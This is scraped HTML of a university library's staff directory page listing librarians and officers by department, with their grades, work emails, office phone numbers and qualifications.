menu-item-type-post_type menu-item-object-page menu-item-17863"><a href="https://www.ukm.my/ptsl/?page_id=17835">CONTACT US</a></li> <li class="search-toggle-li" ><a href="https://www.ukm.my/ptsl/#" class="site-search-toggle search-dropdown-toggle"><span class="screen-reader-text">Toggle website search</span><i class=" icon-magnifier" aria-hidden="true" role="img"></i></a></li></ul> <div id="mobile-menu-search" class="clr"> <form aria-label="Search this website" method="get" action="https://www.ukm.my/ptsl/" class="mobile-searchform"> <input aria-label="Insert search query" value="" class="field" id="ocean-mobile-search-2" type="search" name="s" autocomplete="off" placeholder="Search" /> <button aria-label="Submit search" type="submit" class="searchform-submit"> <i class=" icon-magnifier" aria-hidden="true" role="img"></i> </button> <input type="hidden" name="lang" value="en" /> </form> </div><!-- .mobile-menu-search --> </nav> </div> </header><!-- #site-header --> <main id="main" class="site-main clr" role="main"> <div data-elementor-type="wp-page" data-elementor-id="378" class="elementor elementor-378"> <section class="elementor-section elementor-top-section elementor-element elementor-element-063c460 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="063c460" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8ff1425" data-id="8ff1425" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-3e5def6 cpel-switcher--align-right cpel-switcher--layout-horizontal elementor-widget elementor-widget-polylang-language-switcher" data-id="3e5def6" data-element_type="widget" data-widget_type="polylang-language-switcher.default"> <div class="elementor-widget-container"> <nav class="cpel-switcher__nav"></nav> </div> </div> </div> </div> </div> </section> <header class="elementor-section elementor-top-section elementor-element elementor-element-6c751c94 elementor-section-height-min-height elementor-section-content-middle elementor-reverse-mobile elementor-section-items-stretch elementor-section-boxed elementor-section-height-default" data-id="6c751c94" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-background-overlay"></div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-13903c1f" data-id="13903c1f" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-f2c7b17" data-id="f2c7b17" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-dccffd2" data-id="dccffd2" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-db79367 elementor-widget elementor-widget-image" data-id="db79367" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img fetchpriority="high" decoding="async" width="839" height="404" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/06/UKM_logo_4C_teks-putih.png" class="attachment-large size-large wp-image-235" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/06/UKM_logo_4C_teks-putih.png 839w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/UKM_logo_4C_teks-putih-300x144.png 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/UKM_logo_4C_teks-putih-768x370.png 768w" sizes="(max-width: 839px) 100vw, 839px" /> </div> </div> </div> </div> </div> </header> <section class="elementor-section elementor-top-section elementor-element elementor-element-605e9ba elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="605e9ba" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7084650" data-id="7084650" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-72dd1ac elementor-widget elementor-widget-heading" data-id="72dd1ac" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">THE LIBRARIANS & OFFICERS</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-5a699ed7 elementor-reverse-tablet elementor-reverse-mobile elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5a699ed7" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2e6132aa" data-id="2e6132aa" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-ea4bfaf elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="ea4bfaf" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-5caeb6b" data-id="5caeb6b" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-bc39421 elementor-widget elementor-widget-heading" data-id="bc39421" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">DEPARTMENT OF PLANNING & ADMINISTRATION </h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-f6334ea elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="f6334ea" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-e2529d2" data-id="e2529d2" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-614ca0c elementor-widget elementor-widget-heading" data-id="614ca0c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">ADMINISTRATION</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-8e94d6b elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="8e94d6b" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-24a8e0e" data-id="24a8e0e" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-d7aa48f elementor-widget__width-initial elementor-widget elementor-widget-image" data-id="d7aa48f" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1571-200x300.jpg" class="attachment-medium size-medium wp-image-1258" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1571-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1571-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1571-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1571-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1571-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1571-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-29d69bb elementor-widget elementor-widget-heading" data-id="29d69bb" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default"><br>zaidah sulaiman</h3> </div> </div> <div class="elementor-element elementor-element-fdfac00 elementor-widget elementor-widget-heading" data-id="fdfac00" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span>Head of Administration (Deputy Chief Librarian) (S52)</span></div> </div> </div> <div class="elementor-element elementor-element-55e0690 elementor-widget elementor-widget-text-editor" data-id="55e0690" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; text-align: left;">zdh@ukm.edu.my</span><br style="text-align: left;" /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; text-align: left;">03-8921 5059</span><br style="text-align: left;" /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; text-align: left;">Postgrad. Dip. in Lib. Sc. (UiTM)</span><br style="text-align: left;" /><span style="font-variant-ligatures: normal; font-variant-caps: normal; font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-weight: 400; text-align: left;" data-wahfont="14">B. Food Sc & Technology (UPM)</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-56cd03f" data-id="56cd03f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-18eaf23 elementor-widget elementor-widget-image" data-id="18eaf23" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1553-200x300.jpg" class="attachment-medium size-medium wp-image-1221" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1553-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1553-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1553-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1553-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1553-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1553-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-2945d8c elementor-widget elementor-widget-heading" data-id="2945d8c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">ILYA EZIANE BINTI MOHD NOOR</h3> </div> </div> <div class="elementor-element elementor-element-92ae574 elementor-widget elementor-widget-heading" data-id="92ae574" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Office Secretary (N32) </div> </div> </div> <div class="elementor-element elementor-element-6a1e65a elementor-widget elementor-widget-text-editor" data-id="6a1e65a" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>ilya@ukm.edu.my<br />03-89215031</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-cc53aa7" data-id="cc53aa7" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-0ac2ce4 elementor-widget elementor-widget-image" data-id="0ac2ce4" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="225" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1577_1-225x300.jpg" class="attachment-medium size-medium wp-image-1225" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1577_1-225x300.jpg 225w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1577_1-768x1023.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1577_1-1153x1536.jpg 1153w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1577_1-1537x2048.jpg 1537w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1577_1-scaled.jpg 1921w" sizes="(max-width: 225px) 100vw, 225px" /> </div> </div> <div class="elementor-element elementor-element-aafac8d elementor-widget elementor-widget-heading" data-id="aafac8d" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">SHAHRIZAL BIN SUBHI</h3> </div> </div> <div class="elementor-element elementor-element-c7a348c elementor-widget elementor-widget-heading" data-id="c7a348c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Assistant Engineer (JA29)</div> </div> </div> <div class="elementor-element elementor-element-1ebd2ce elementor-widget elementor-widget-text-editor" data-id="1ebd2ce" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>shahrizal@ukm.edu.my<br />03-89215020</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-d4b56e4" data-id="d4b56e4" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-893ded9 elementor-widget elementor-widget-image" data-id="893ded9" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1697-200x300.jpg" class="attachment-medium size-medium wp-image-1209" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1697-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1697-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1697-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1697-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1697-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1697-scaled.jpg 1706w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-d092671 elementor-widget elementor-widget-heading" data-id="d092671" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">AHMAD MUHAIMIN JUSOH</h3> </div> </div> <div class="elementor-element elementor-element-60067e7 elementor-widget elementor-widget-heading" data-id="60067e7" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Assistant Engineer (JA29)</div> </div> </div> <div class="elementor-element elementor-element-baa9d21 elementor-widget elementor-widget-text-editor" data-id="baa9d21" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><a href="mailto:mean@ukm.edu.my">mean@ukm.edu.my</a><br />03-89215020</p> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-59243a4 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="59243a4" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-fc11900" data-id="fc11900" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-57b0fde elementor-widget elementor-widget-heading" data-id="57b0fde" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">STRATEGIC PLANNING</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-58a3be7 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="58a3be7" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-f315f33" data-id="f315f33" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-bfd9701" data-id="bfd9701" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-047ac1c elementor-widget elementor-widget-image" data-id="047ac1c" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1717-200x300.jpg" class="attachment-medium size-medium wp-image-1193" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1717-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1717-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1717-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1717-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1717-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1717-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-061f7d7 elementor-widget elementor-widget-heading" data-id="061f7d7" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Siti Wahida Amanullah</h3> </div> </div> <div class="elementor-element elementor-element-c716f18 elementor-widget elementor-widget-heading" data-id="c716f18" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span>Head Division (</span>Senior Librarian) (S44)</div> </div> </div> <div class="elementor-element elementor-element-d02abe2 elementor-widget elementor-widget-heading" data-id="d02abe2" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span>wydaman@ukm.edu.my<br></span>03-89214537<br>MLIS (UM)<br><span>B.Sc. (Hons) Information Studies (UiTM)</span></div> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-2f128fe" data-id="2f128fe" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-7ca8301 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="7ca8301" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-dc40394" data-id="dc40394" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-66176f8 elementor-widget elementor-widget-heading" data-id="66176f8" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">INCOME GENERATING</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-d89260e elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="d89260e" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-0d13d97" data-id="0d13d97" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-c21313b" data-id="c21313b" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-ba006e4 elementor-widget elementor-widget-image" data-id="ba006e4" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1617-200x300.jpg" class="attachment-medium size-medium wp-image-1164" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1617-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1617-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1617-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1617-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1617-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1617-scaled.jpg 1706w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-ab9057a elementor-widget elementor-widget-heading" data-id="ab9057a" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Mohd Rajak Telimik</h3> </div> </div> <div class="elementor-element elementor-element-7db54ad elementor-widget elementor-widget-heading" data-id="7db54ad" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head Division (Senior Librarian) (S44)</div> </div> </div> <div class="elementor-element elementor-element-c3316e2 elementor-widget elementor-widget-text-editor" data-id="c3316e2" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>mrt@ukm.edu.my<br />03-8921 3959<br />MLS (UiTM)<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-77b8c85" data-id="77b8c85" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-c43ed6a elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="c43ed6a" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-1dbc730" data-id="1dbc730" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-3359c9d elementor-widget elementor-widget-heading" data-id="3359c9d" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">CORPORATE COMMUNICATION</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-686e09b elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="686e09b" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-82f8ee1" data-id="82f8ee1" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-7d06d8d" data-id="7d06d8d" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-b6c76eb elementor-widget elementor-widget-image" data-id="b6c76eb" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1648-200x300.jpg" class="attachment-medium size-medium wp-image-1181" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1648-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1648-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1648-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1648-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1648-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1648-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-b5263cf elementor-widget elementor-widget-heading" data-id="b5263cf" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Muhammad hazriq ghazali</h3> </div> </div> <div class="elementor-element elementor-element-fab54df elementor-widget elementor-widget-heading" data-id="fab54df" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head Division (<span>Senior Librarian (S44)</span></div> </div> </div> <div class="elementor-element elementor-element-7972306 elementor-widget elementor-widget-text-editor" data-id="7972306" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">mhazriq@ukm.edu.my</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">03-89214084</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">B.Sc. (Hons) Information Studies (UiTM)</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-3b4d5e2" data-id="3b4d5e2" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-554d79d elementor-widget elementor-widget-image" data-id="554d79d" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1972-200x300.jpg" class="attachment-medium size-medium wp-image-5410" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1972-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1972-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1972-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1972-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1972-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1972-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-0aa4e87 elementor-widget elementor-widget-heading" data-id="0aa4e87" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Amirah hafzhan Ismail</div> </div> </div> <div class="elementor-element elementor-element-4b3e269 elementor-widget elementor-widget-heading" data-id="4b3e269" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Librarian (S41)</div> </div> </div> <div class="elementor-element elementor-element-fc9a857 elementor-widget elementor-widget-text-editor" data-id="fc9a857" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p style="font-variant-ligatures: normal; font-variant-caps: normal; font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-weight: 400;">amirah.ismail@ukm.edu.my<br />03-89213864<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-e99c4eb" data-id="e99c4eb" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-cca2755 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="cca2755" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-968a26d" data-id="968a26d" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-84a469b elementor-widget elementor-widget-heading" data-id="84a469b" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">DEPARTMENT INFORMATION RESOURCE DEVELOPMENT </h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-fbbaff3 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="fbbaff3" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-9a07818" data-id="9a07818" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-5ff5a07 elementor-widget elementor-widget-heading" data-id="5ff5a07" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">ACQUISITION & CATALOGUE </h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-481d67f elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="481d67f" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-a3cd115" data-id="a3cd115" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-087cf7b" data-id="087cf7b" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-33b7a9e elementor-widget elementor-widget-image" data-id="33b7a9e" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1561-200x300.jpg" class="attachment-medium size-medium wp-image-1161" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1561-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1561-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1561-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1561-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1561-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1561-scaled.jpg 1706w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-0626e67 elementor-widget elementor-widget-heading" data-id="0626e67" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Nik Zaleha Nik Mustapha</h3> </div> </div> <div class="elementor-element elementor-element-9696b34 elementor-widget elementor-widget-heading" data-id="9696b34" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head Division (Senior Librarian) (S44)</div> </div> </div> <div 